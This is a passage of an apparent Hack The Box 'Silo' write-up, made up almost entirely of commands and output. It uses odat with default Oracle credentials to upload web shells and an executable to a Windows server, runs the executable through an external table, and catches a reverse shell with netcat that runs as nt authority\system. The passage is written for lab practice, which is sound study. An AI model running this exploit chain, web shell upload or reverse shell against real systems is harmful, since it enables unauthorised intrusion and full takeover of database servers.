6 odat shell

$ odat dbmsadvisor -s silo.htb -p 1521 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot shell.aspx /home/kashz/Desktop/HTB/silo/shell.aspx

[1] (10.10.10.82:1521): Put the /home/kashz/Desktop/HTB/silo/shell.aspx local file in the C:\inetpub\wwwroot path (named shell.aspx) of the 10.10.10.82 server
[-] The /home/kashz/Desktop/HTB/silo/shell.aspx local file was not put in the remote C:\inetpub\wwwroot path (named shell.aspx): `ORA-06550: line 1, column 7: PLS-00306: wrong number or types of arguments in call to 'CREATE_FILE' ORA-06550: line 1, column 7: PL/SQL: Statement ignored`

# another method
$ odat utlfile -s silo.htb -p 1521 -U SCOTT -P tiger -d XE --sysdba --putFile /temp kashz.exe /home/kashz/Desktop/HTB/silo/kashz.exe

[1] (10.10.10.82:1521): Put the /home/kashz/Desktop/HTB/silo/kashz.exe local file in the /temp folder like kashz.exe on the 10.10.10.82 server
[+] The /home/kashz/Desktop/HTB/silo/kashz.exe file was created on the /temp directory on the 10.10.10.82 server like the kashz.exe file

# to call file use odat externaltable
$ odat externaltable -s silo.htb -p 1521 -U SCOTT -P tiger -d XE --sysdba --exec /temp kashz.exe
[1] (10.10.10.82:1521): Execute the kashz.exe command stored in the /temp path

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.82] 49166
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

Also works

$ odat utlfile -s silo.htb -d XE -p 1521 -U 'scott' -P 'tiger' --sysdba --putFile C:\\inetpub\\wwwroot fx.aspx /usr/share/webshells/aspx/cmdasp.aspx

Last updated